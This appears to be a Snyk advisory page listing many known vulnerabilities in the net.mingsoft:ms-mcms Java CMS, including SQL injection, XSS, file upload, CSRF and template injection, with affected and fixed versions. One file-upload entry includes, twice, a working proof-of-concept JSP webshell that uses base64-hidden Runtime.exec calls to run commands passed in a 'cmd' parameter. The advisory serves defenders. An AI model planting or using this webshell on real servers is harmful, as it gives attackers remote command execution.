net.mingsoft:ms-mcms 4.6.3-SNAPSHOTS vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the net.mingsoft:ms-mcms package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability	Vulnerable Version
M Cross-site Scripting (XSS) Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper input sanitization. An attacker can execute arbitrary JavaScript code in the context of a user's browser by tricking a user into clicking a crafted link or submitting a malicious payload. How to fix Cross-site Scripting (XSS)? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
M SQL Injection Affected versions of this package are vulnerable to SQL Injection via unsanitized input in the `content_title` parameter of the `/cms/content/list` endpoint during FreeMarker template rendering. An attacker can execute arbitrary SQL queries by supplying crafted input. How to fix SQL Injection? Upgrade `net.mingsoft:ms-mcms` to version 6.0.2 or higher.	[,6.0.2)
C Arbitrary File Upload Affected versions of this package are vulnerable to Arbitrary File Upload via the `ueditor` component in the article management module. An attacker can execute arbitrary code by uploading a malicious XML file. How to fix Arbitrary File Upload? Upgrade `net.mingsoft:ms-mcms` to version 5.5.0 or higher.	[0,5.5.0)
H Improper Control of Generation of Code ('Code Injection') Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') due to the front-end file upload process. An attacker can execute arbitrary commands on the server by uploading a malicious file. How to fix Improper Control of Generation of Code ('Code Injection')? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
H Unrestricted Upload of File with Dangerous Type Affected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type via a crafted POST request to `/ms/file/upload.do`, due to improper filtering for file extensions. An attacker can upload arbitrary files, potentially leading to remote code execution or other malicious activities. How to fix Unrestricted Upload of File with Dangerous Type? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
H Information Exposure Affected versions of this package are vulnerable to Information Exposure via a crafted script to the `password` parameter. An attacker can obtain sensitive information by sending a specially crafted request to the affected parameter. How to fix Information Exposure? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
C SQL Injection Affected versions of this package are vulnerable to SQL Injection via the `categoryType` parameter at `/content/list.do`. An attacker can manipulate the backend database by injecting malicious SQL commands. How to fix SQL Injection? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
L Cross-site Scripting (XSS) Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in `search.do`, which is exploitable via HTTP POST Request involving the `content_title` parameter. How to fix Cross-site Scripting (XSS)? Upgrade `net.mingsoft:ms-mcms` to version 5.3.2 or higher.	[,5.3.2)
H Arbitrary File Upload Affected versions of this package are vulnerable to Arbitrary File Upload via a crafted thumbnail. Exploiting this vulnerability might result in arbitrary code execution. Note: This vulnerability impacts only Windows operation system. How to fix Arbitrary File Upload? Upgrade `net.mingsoft:ms-mcms` to version 5.1 or higher.	[,5.1)
H SQL Injection Affected versions of this package are vulnerable to SQL Injection via the `basic_title` parameter. How to fix SQL Injection? Upgrade `net.mingsoft:ms-mcms` to version 5.1 or higher.	[,5.1)
M Arbitrary File Upload Affected versions of this package are vulnerable to Arbitrary File Upload via the `ms/template/writeFileContent.do` component. How to fix Arbitrary File Upload? Upgrade `net.mingsoft:ms-mcms` to version 5.2.11 or higher.	[,5.2.11)
L Cross-site Scripting (XSS) Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization when saving or updating articles. How to fix Cross-site Scripting (XSS)? Upgrade `net.mingsoft:ms-mcms` to version 5.2.11 or higher.	[0,5.2.11)
H SQL Injection Affected versions of this package are vulnerable to SQL Injection due to improper sanitization, via the `/cms/category/list` endpoint. How to fix SQL Injection? Upgrade `net.mingsoft:ms-mcms` to version 5.2.10 or higher.	[,5.2.10)
C SQL Injection Affected versions of this package are vulnerable to SQL Injection via model lists in `/mdiy/model/delete` URI. How to fix SQL Injection? Upgrade `net.mingsoft:ms-mcms` to version 5.2.9 or higher.	[0,5.2.9)
C SQL Injection Affected versions of this package are vulnerable to SQL Injection via the `fieldName` parameter in the `/mdiy/page/verify` URI. How to fix SQL Injection? Upgrade `net.mingsoft:ms-mcms` to version 5.2.9 or higher.	[0,5.2.9)
H Arbitrary File Upload Affected versions of this package are vulnerable to Arbitrary File Upload via the `TemplateAction` class. Exploiting this vulnerability is possible by uploading a `zip` file to the `TemplateAction` API, with a `jsp` file, thus bypassing the file upload filter implemented in the upload functionality. How to fix Arbitrary File Upload? Upgrade `net.mingsoft:ms-mcms` to version 5.2.9 or higher.	[0,5.2.9)
M Cross-site Request Forgery (CSRF) Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) where it's possible to add an administrator account via `ms/basic/manager/save.do`. How to fix Cross-site Request Forgery (CSRF)? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
M Arbitrary File Upload Affected versions of this package are vulnerable to Arbitrary File Upload by allowing an attacker to execute arbitrary code through a crafted ZIP file. How to fix Arbitrary File Upload? Upgrade `net.mingsoft:ms-mcms` to version 5.2.8 or higher.	[,5.2.8)
C SQL Injection Affected versions of this package are vulnerable to SQL Injection in `/mdiy/dict/list/` URI via `orderBy` parameter. How to fix SQL Injection? Upgrade `net.mingsoft:ms-mcms` to version 5.2.8 or higher.	[,5.2.8)
C SQL Injection Affected versions of this package are vulnerable to SQL Injection in `/mdiy/dict/listExcludeApp` URI via the `orderBy` parameter. How to fix SQL Injection? Upgrade `net.mingsoft:ms-mcms` to version 5.2.8 or higher.	[,5.2.8)
H SQL Injection Affected versions of this package are vulnerable to SQL Injection via the `orderBy` parameter at `/dict/list.do`. How to fix SQL Injection? Upgrade `net.mingsoft:ms-mcms` to version 5.2.9 or higher.	[0,5.2.9)
M Cross-site Request Forgery (CSRF) Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) via `/role/saveOrUpdateRole.do` which allows attackers to escalate privileges and modify data. How to fix Cross-site Request Forgery (CSRF)? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
M SQL Injection Affected versions of this package are vulnerable to SQL Injection via `/cms/content/list`. This is due to a lack of filtering and escaping of SQL data. How to fix SQL Injection? Upgrade `net.mingsoft:ms-mcms` to version 5.2.8 or higher.	[0,5.2.8)
C Remote Code Execution (RCE) Affected versions of this package are vulnerable to Remote Code Execution (RCE). By using a freemarker template function called `Execute`. How to fix Remote Code Execution (RCE)? Upgrade `net.mingsoft:ms-mcms` to version 5.2.6 or higher.	[0,5.2.6)
H SQL Injection Affected versions of this package are vulnerable to SQL Injection via the `categoryId` parameter in `IContentDao.xml`. How to fix SQL Injection? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
H SQL Injection Affected versions of this package are vulnerable to SQL Injection via `search.do` in the file `/mdiy/dict/listExcludeApp`. How to fix SQL Injection? Upgrade `net.mingsoft:ms-mcms` to version 5.2.6 or higher.	[0,5.2.6)
H SQL Injection Affected versions of this package are vulnerable to SQL Injection via `search.do` in `/web/MCmsAction.java`. How to fix SQL Injection? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
H External Control of File Name or Path Affected versions of this package are vulnerable to External Control of File Name or Path via the `oldFileName` variable of the `writeFileContent` function. If this variable is not equal to the `fileName` variable, the `oldFileName` file gets deleted. How to fix External Control of File Name or Path? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
H Server-side Template Injection (SSTI) Affected versions of this package are vulnerable to Server-side Template Injection (SSTI) via the Template Management module, where it is possible to add a template with a crafted payload in order to execute commands on the underlaying server. How to fix Server-side Template Injection (SSTI)? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
H Arbitrary File Upload Affected versions of this package are vulnerable to Arbitrary File Upload via the `/file/upload` endpoint. A `.jspx` file will circumvent the filtering set in place and allow the attacker to get a webshell. ##PoC <%@ page contentType="text/html;charset=UTF-8" language="java" %> <%@ page import="sun.misc.BASE64Decoder" %> <% if(request.getParameter("cmd")!=null){ BASE64Decoder decoder = new BASE64Decoder(); Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU="))); Process e = (Process) rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new Object[]{}), request.getParameter("cmd") ); java.io.InputStream in = e.getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %> How to fix Arbitrary File Upload? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
M Arbitrary File Deletion Affected versions of this package are vulnerable to Arbitrary File Deletion via the `unZip()` function in `net/mingsoft/basic/action/TemplateAction.java`, where after unzipping the file specified is deleted (whether it exists or not). How to fix Arbitrary File Deletion? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
H SQL Injection Affected versions of this package are vulnerable to SQL Injection due to improper input sanitization in `categoryId` parameter in `ContentBizImpl.java`. How to fix SQL Injection? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
C SQL Injection Affected versions of this package are vulnerable to SQL Injection via the `orderby` parameter which isn't handled correctly through the `/mcms/view.do` endpoint while unauthenticated. How to fix SQL Injection? Upgrade `net.mingsoft:ms-mcms` to version 5.1 or higher.	[,5.1)
H Arbitrary File Upload Affected versions of this package are vulnerable to Arbitrary File Upload via the `upload` method. The only files that are restricted for upload are `.exe` and `.jsp`. This can lead to RCE when a webshell with a `.jspx` type, for example, is uploaded this way. How to fix Arbitrary File Upload? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
H SQL Injection Affected versions of this package are vulnerable to SQL Injection via the IDictBiz interface, through which the value of `orderBy` is directly spliced into the SQL statement without any filtering, allowing to exfiltrate sensitive data. How to fix SQL Injection? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
H SQL Injection Affected versions of this package are vulnerable to SQL Injection via the IModelDataBiz interface, which requires implementing the `queryDiyFormData` method. The way it is implemented allows the `orderBy` value to be injected into the statement when resolving a GET request. How to fix SQL Injection? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
C Arbitrary Code Execution Affected versions of this package are vulnerable to Arbitrary Code Execution in the `New Template` module. It allows attackers to upload malicious zip archives, upload a new template, and add malicious code in the template to realize command execution. How to fix Arbitrary Code Execution? Upgrade `net.mingsoft:ms-mcms` to version 5.2.6 or higher.	[,5.2.6)
C Arbitrary File Upload Affected versions of this package are vulnerable to Arbitrary File Upload via the `com\mingsoft\basic\action\web\FileAction.java` component. Since the upload interface does not verify the user login status, an attacker can use this interface to upload files without setting a cookie. How to fix Arbitrary File Upload? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)
H Directory Traversal Affected versions of this package are vulnerable to Directory Traversal via the `com\mingsoft\cms\action\GeneraterAction.java` file. An attacker can write a `.jsp` file to an arbitrary directory via a `../` Directory Traversal in the url parameter. How to fix Directory Traversal? There is no fixed version for `net.mingsoft:ms-mcms`.	[0,)

Vulnerability

Vulnerable Version

Cross-site Scripting (XSS)

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper input sanitization. An attacker can execute arbitrary JavaScript code in the context of a user's browser by tricking a user into clicking a crafted link or submitting a malicious payload.

How to fix Cross-site Scripting (XSS)?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via unsanitized input in the content_title parameter of the /cms/content/list endpoint during FreeMarker template rendering. An attacker can execute arbitrary SQL queries by supplying crafted input.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 6.0.2 or higher.

[,6.0.2)

Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the ueditor component in the article management module. An attacker can execute arbitrary code by uploading a malicious XML file.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version 5.5.0 or higher.

[0,5.5.0)

Improper Control of Generation of Code ('Code Injection')

Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') due to the front-end file upload process. An attacker can execute arbitrary commands on the server by uploading a malicious file.

How to fix Improper Control of Generation of Code ('Code Injection')?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

Unrestricted Upload of File with Dangerous Type

Affected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type via a crafted POST request to /ms/file/upload.do, due to improper filtering for file extensions. An attacker can upload arbitrary files, potentially leading to remote code execution or other malicious activities.

How to fix Unrestricted Upload of File with Dangerous Type?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

Information Exposure

Affected versions of this package are vulnerable to Information Exposure via a crafted script to the password parameter. An attacker can obtain sensitive information by sending a specially crafted request to the affected parameter.

How to fix Information Exposure?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the categoryType parameter at /content/list.do. An attacker can manipulate the backend database by injecting malicious SQL commands.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

Cross-site Scripting (XSS)

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in search.do, which is exploitable via HTTP POST Request involving the content_title parameter.

How to fix Cross-site Scripting (XSS)?

Upgrade net.mingsoft:ms-mcms to version 5.3.2 or higher.

[,5.3.2)

Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via a crafted thumbnail. Exploiting this vulnerability might result in arbitrary code execution.

Note: This vulnerability impacts only Windows operation system.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version 5.1 or higher.

[,5.1)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the basic_title parameter.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.1 or higher.

[,5.1)

Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the ms/template/writeFileContent.do component.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version 5.2.11 or higher.

[,5.2.11)

Cross-site Scripting (XSS)

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization when saving or updating articles.

How to fix Cross-site Scripting (XSS)?

Upgrade net.mingsoft:ms-mcms to version 5.2.11 or higher.

[0,5.2.11)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection due to improper sanitization, via the /cms/category/list endpoint.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.10 or higher.

[,5.2.10)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via model lists in /mdiy/model/delete URI.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the fieldName parameter in the /mdiy/page/verify URI.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)

Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the TemplateAction class. Exploiting this vulnerability is possible by uploading a zip file to the TemplateAction API, with a jsp file, thus bypassing the file upload filter implemented in the upload functionality.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)

Cross-site Request Forgery (CSRF)

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) where it's possible to add an administrator account via ms/basic/manager/save.do.

How to fix Cross-site Request Forgery (CSRF)?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload by allowing an attacker to execute arbitrary code through a crafted ZIP file.

How to fix Arbitrary File Upload?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

[,5.2.8)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection in /mdiy/dict/list/ URI via orderBy parameter.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

[,5.2.8)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection in /mdiy/dict/listExcludeApp URI via the orderBy parameter.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

[,5.2.8)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the orderBy parameter at /dict/list.do.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.9 or higher.

[0,5.2.9)

Cross-site Request Forgery (CSRF)

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) via /role/saveOrUpdateRole.do which allows attackers to escalate privileges and modify data.

How to fix Cross-site Request Forgery (CSRF)?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via /cms/content/list. This is due to a lack of filtering and escaping of SQL data.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.8 or higher.

[0,5.2.8)

Remote Code Execution (RCE)

Affected versions of this package are vulnerable to Remote Code Execution (RCE). By using a freemarker template function called Execute.

How to fix Remote Code Execution (RCE)?

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

[0,5.2.6)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the categoryId parameter in IContentDao.xml.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via search.do in the file /mdiy/dict/listExcludeApp.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

[0,5.2.6)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via search.do in /web/MCmsAction.java.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

External Control of File Name or Path

Affected versions of this package are vulnerable to External Control of File Name or Path via the oldFileName variable of the writeFileContent function. If this variable is not equal to the fileName variable, the oldFileName file gets deleted.

How to fix External Control of File Name or Path?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

Server-side Template Injection (SSTI)

Affected versions of this package are vulnerable to Server-side Template Injection (SSTI) via the Template Management module, where it is possible to add a template with a crafted payload in order to execute commands on the underlaying server.

How to fix Server-side Template Injection (SSTI)?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the /file/upload endpoint. A .jspx file will circumvent the filtering set in place and allow the attacker to get a webshell.

##PoC

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
    BASE64Decoder decoder = new BASE64Decoder();
    Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
    Process e = (Process)
            rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                    String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                    Object[]{}), request.getParameter("cmd") );
    java.io.InputStream in = e.getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>

How to fix Arbitrary File Upload?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

Arbitrary File Deletion

Affected versions of this package are vulnerable to Arbitrary File Deletion via the unZip() function in net/mingsoft/basic/action/TemplateAction.java, where after unzipping the file specified is deleted (whether it exists or not).

How to fix Arbitrary File Deletion?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection due to improper input sanitization in categoryId parameter in ContentBizImpl.java.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the orderby parameter which isn't handled correctly through the /mcms/view.do endpoint while unauthenticated.

How to fix SQL Injection?

Upgrade net.mingsoft:ms-mcms to version 5.1 or higher.

[,5.1)

Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the upload method. The only files that are restricted for upload are .exe and .jsp. This can lead to RCE when a webshell with a .jspx type, for example, is uploaded this way.

How to fix Arbitrary File Upload?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the IDictBiz interface, through which the value of orderBy is directly spliced into the SQL statement without any filtering, allowing to exfiltrate sensitive data.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

SQL Injection

Affected versions of this package are vulnerable to SQL Injection via the IModelDataBiz interface, which requires implementing the queryDiyFormData method. The way it is implemented allows the orderBy value to be injected into the statement when resolving a GET request.

How to fix SQL Injection?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

Arbitrary Code Execution

Affected versions of this package are vulnerable to Arbitrary Code Execution in the New Template module. It allows attackers to upload malicious zip archives, upload a new template, and add malicious code in the template to realize command execution.

How to fix Arbitrary Code Execution?

Upgrade net.mingsoft:ms-mcms to version 5.2.6 or higher.

[,5.2.6)

Arbitrary File Upload

Affected versions of this package are vulnerable to Arbitrary File Upload via the com\mingsoft\basic\action\web\FileAction.java component. Since the upload interface does not verify the user login status, an attacker can use this interface to upload files without setting a cookie.

How to fix Arbitrary File Upload?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

Directory Traversal

Affected versions of this package are vulnerable to Directory Traversal via the com\mingsoft\cms\action\GeneraterAction.java file. An attacker can write a .jsp file to an arbitrary directory via a ../ Directory Traversal in the url parameter.

How to fix Directory Traversal?

There is no fixed version for net.mingsoft:ms-mcms.

[0,)

net.mingsoft:ms-mcms@4.6.3-SNAPSHOTS vulnerabilities

latest version

first published

latest version published

licenses detected

package registry

Direct Vulnerabilities

Fix vulnerabilities automatically